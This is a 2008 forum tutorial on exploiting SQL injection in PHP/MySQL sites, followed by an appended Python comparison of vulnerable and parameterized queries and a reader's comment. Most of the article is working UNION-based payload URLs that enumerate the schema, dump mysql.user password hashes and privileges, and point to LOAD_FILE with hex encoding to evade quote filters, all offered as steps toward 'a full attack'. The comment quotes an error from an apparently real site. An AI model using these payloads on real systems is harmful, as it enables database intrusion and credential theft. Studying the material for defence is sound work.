SQL Injections Revealed - Submitted By: Link- 2008-09-23 16:01:02
-------------------- | SQL Injection | --------------------

Description

Server type: LAMP - Linux - Apache - MySQL - PHP

In this simple article I will go through the basic steps, from finding an SQL injection to fully exploiting a database. Nevertheless, this article is never enough! You have to dig deeper, you have to try and work hard to acquire the necessary knowledge to launch a full attack and to find vulnerabilities.

Let's start...

Let's suppose we have the following URL:

http://fakeurl.com/index.php?id=1016

This is a page that displays articles extracted from a database. Please note that not all URLs of this form are connected to a database! Some of them just extract the text from local .txt files, or they are just includes. Anyway, let's test whether this database can be injected with other code:

http://fakeurl.com/index.php?id=10160 or 1=1--

If you get a blank page or an error is displayed, then you've got a vulnerability. If not, don't worry, try this one:

http://fakeurl.com/index.php?id=10160 and 1=0--

The purpose here is to provoke an informative error. Again you should get a blank page or an error. If you are lucky, then you should proceed with your attack:

http://fakeurl.com/index.php?id=10160 ORDER BY 1--

Increment the ORDER BY number till you get a blank page or an error page; this will help us determine the column set size. Let's suppose you get a blank page when you reach the number seven: this means that the number of columns we can poison is 6.

The next step is to use UNION queries. Why do we use UNION? Let's explain a little what ?id=10160 means. When an HTTP request is sent in the form of POST or GET, the PHP code records the value after the = sign as a variable, which is then used to get data from a database.

?id=1 is transformed into this query:

SELECT article_title, article_body FROM table WHERE id=10160;

Now everything after the id value is appended to the main query:

http://fakeurl.com/index.php?id=10160 ORDER BY 1-- :: SELECT article_title, article_body FROM table WHERE id=10160 ORDER BY 1--;

Now the union part: SELECT ... SELECT is NOT valid! Thus we use SELECT ... UNION SELECT to combine two SELECT statements and display both results!

Ok, now that we understand the inside, let's move on! The next step is to use SELECT to gain more info. Don't forget to replace 10160 with null, so that the first SELECT statement returns nothing and only the UNIONed data is displayed!

http://fakeurl.com/index.php?id=null UNION ALL SELECT 1,2,3,4,5,6--

This should display (and this is only an example):

1 3 5 6

This means that we can replace 1, 3, 5 and 6 with functions or other things to display info on the page! Let's try the following:

http://fakeurl.com/index.php?id=null UNION ALL SELECT table_schema,2,table_name,4,column_name,ordinal_position from information_schema.COLUMNS--

Where:
table_schema: name of the database
table_name: name of the table in the database
column_name: name of the column in the table
ordinal_position: original position of the column

A second statement to use is:

http://fakeurl.com/index.php?id=null UNION ALL SELECT host,2,user,4,password,6 from mysql.user--

host: host the user is valid on
user: the user's login name
password: the stored password hashes

A third informational statement would be:

http://fakeurl.com/index.php?id=null UNION ALL SELECT version(),2,3,4,5,6--

version(): MySQL database version

Another statement: [1]

http://fakeurl.com/index.php?id=null UNION ALL SELECT grantee,2,table_catalog,4,privilege_type,is_grantable from information_schema.USER_PRIVILEGES--

grantee: the user the privileges apply to
table_catalog: information regarding the table catalog
privilege_type: the permission granted to the user
is_grantable: whether the permission is grantable

If the user on the database has file permissions, the LOAD_FILE routine can be used to extract and view the contents of files on the filesystem! In order to bypass quote filtering, an ASCII -> hexadecimal string conversion utility is used. This effectively bypasses most quote filtering done by the application.

[1]: Taken from Understanding MySQL Union Poisoning | Jason A. Medeiros

I hope you have gained a good understanding of these injections. There is still a lot more to learn: you have MSSQL, PostgreSQL and Oracle databases that you need to learn too, and knowing PHP is very helpful! Please do not rely on this article to rank yourself among the best; this is very basic but still very helpful. Being the best is all about knowing why things happen!

Warm Regards,
Link-
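As an added illustration (not part of Link-'s article), the following Python snippet mirrors the index.php described above in two versions: one concatenates the raw ?id= value into the query text, as the vulnerable page does, and the other binds it as a parameter. SQLite stands in for MySQL, and the articles/users tables, the 1016 row and the placeholder hash are constructed sample data.

```python
import sqlite3

# Constructed sample schema standing in for the article's LAMP site
# (SQLite in memory here, not MySQL; table and column names are assumptions).
SCHEMA = """
CREATE TABLE articles (id INTEGER PRIMARY KEY, article_title TEXT, article_body TEXT);
INSERT INTO articles VALUES (1016, 'Hello world', 'First article body');
CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 'HASH_PLACEHOLDER_NOT_A_REAL_HASH');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def fetch_article_vulnerable(conn, id_param):
    """Mirrors the index.php in the article: the raw ?id= value is pasted
    straight into the SQL text, so everything after the number becomes SQL."""
    sql = "SELECT id, article_title, article_body FROM articles WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def fetch_article_safe(conn, id_param):
    """Hardened form: the value is bound as a parameter. A bound value is
    compared as data, so 'null UNION ALL SELECT ...' is just a string that
    matches no id; it never joins the statement. (Checking that the value is
    an integer before the query is still good practice.)"""
    sql = "SELECT id, article_title, article_body FROM articles WHERE id=?"
    return conn.execute(sql, (id_param,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # The UNION payload from the article, adapted to the sample schema.
    payload = "null UNION ALL SELECT 1,user,password FROM users--"
    print(fetch_article_vulnerable(db, "1016"))   # the requested article
    print(fetch_article_vulnerable(db, payload))  # users table rows leak instead
    print(fetch_article_safe(db, "1016"))         # the requested article
    print(fetch_article_safe(db, payload))        # [] : the payload is inert
```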
Comment By: Ashok_thepower 2010-09-06 19:39:42
I am getting this error: Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/content/e/n/g/engstudent/html/latestnewsdetail.php on line 14